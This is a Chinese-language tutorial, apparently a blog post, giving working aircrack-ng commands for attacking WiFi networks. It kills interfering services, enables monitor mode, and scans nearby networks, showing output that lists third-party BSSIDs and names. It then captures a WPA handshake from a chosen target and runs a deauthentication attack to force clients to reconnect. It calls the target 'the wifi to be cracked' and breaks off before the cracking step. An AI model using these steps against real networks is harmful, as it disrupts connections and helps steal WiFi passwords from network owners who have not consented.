详细演示了在Kali虚拟机中进行WiFi安全测试的步骤,包括关闭干扰服务、启动监听模式、扫描WiFi网络、捕获并保存握手包,以及使用deauth攻击获取数据包。文章以实用指南形式,为网络安全专业人士提供了WiFi渗透测试的基础操作

1. 关闭可能影响的服务

airmon-ng check kill

2. 查看可用的无线网卡

airmon-ng

3. 开启网卡监听模式

airmon-ng start wlan0

4. 扫描周围 wifi

airodump-ng wlan0
# airodump-ng wlan0

 CH  5 ][ Elapsed: 1 min ][ 2024-07-09 12:19                                                
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID            
                                                                                            
 64:64:4A:28:B8:6E   -6       93        3    0   1  360   WPA2 CCMP   PSK  Redmi_77EE       
 68:F0:B5:01:DE:10  -46       15        6    0  11  360   WPA2 CCMP   PSK  zzh              
 CC:08:FB:2B:5E:3C  -48       33        0    0   6  405   WPA2 CCMP   PSK  TP-LINK-1503     
 C8:F7:42:4B:27:D6  -50       18        0    0   6   65   WPA2 CCMP   PSK  424b27d6         
 54:0D:F9:00:55:C4  -50       19        0    0   1  360   WPA2 CCMP   PSK  HUAWEI-LK        
 54:0D:F9:00:55:C9  -52       20        0    0   1  360   WPA2 CCMP   PSK  <length:  0>     
 56:A7:03:26:BF:F7  -54        4        1    0   1  540   WPA2 CCMP   PSK  WP2SfIN7priMzFrl 
 A4:56:02:61:21:3D  -54       10        3    0   1  270   WPA2 CCMP   PSK  360WiFi-61213D   
 EC:26:CA:AC:70:58  -55       10        0    0   6  405   WPA2 CCMP   PSK  TP-LINK_7058     
 54:A7:03:66:BF:F7  -55        6        1    0   1  540   WPA2 CCMP   PSK  TP-LINK_BFF7     
 28:D1:27:13:D1:E2  -56       10        0    0   6  130   WPA2 CCMP   PSK  Xiaomi_D1E1      
 38:15:4E:66:08:30  -56        6        0    0  11  130   WPA2 CCMP   PSK  CMCC-ZumH        
 EE:9B:2D:B9:D7:F2  -47        7        0    0   9  360   WPA2 CCMP   PSK  <length:  0>     
 14:09:DC:C6:0D:68  -56        2        0    0   6  130   WPA2 CCMP   PSK  CMCC-MA2T        
 68:DB:54:54:A1:2D  -55        2        0    0   4  130   WPA2 CCMP   PSK  @PHICOMM_1903    
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes          
                                                                                            
 (not associated)   4E:31:31:E1:17:0E  -15    0 - 1      0        2      

5. 开始抓取握手包并保存成文件

airodump-ng -c 6 --s --bssid BC:E0:01:9D:88:C1 wlan0 -w test2

# -c  指定信道,一定要是上一步查到的要破解的wifi所用信道
# -bssid  指定bssid值,一定要是上一步查到的要破解的wifi的bssid
# -w  指定捕获的握手到保存到的文件名
# --s  选项会在输出中显示接收的确认帧数量, 用于确认接收到的数据包

6. 主动出击获取握手包

aireplay-ng -0 2 -a BC:E0:01:9D:88:C1 -c 12:E0:1D:07:BF:F4 wlan0  

# -0表示通知设备断开连接
# 2表示deauth攻击次数,小点大点都行吧
# -a指定仿造的wifi的mac地址(即bssid)
# -c表示要让认证失效的设备的mac地址,在上一步中可以看到

此时会在指定的目录产生以下四个文件
.cap是抓取到握手包的数据包文件
出现 [ WPA handshake: ... ] 表示抓包成功

未完待续...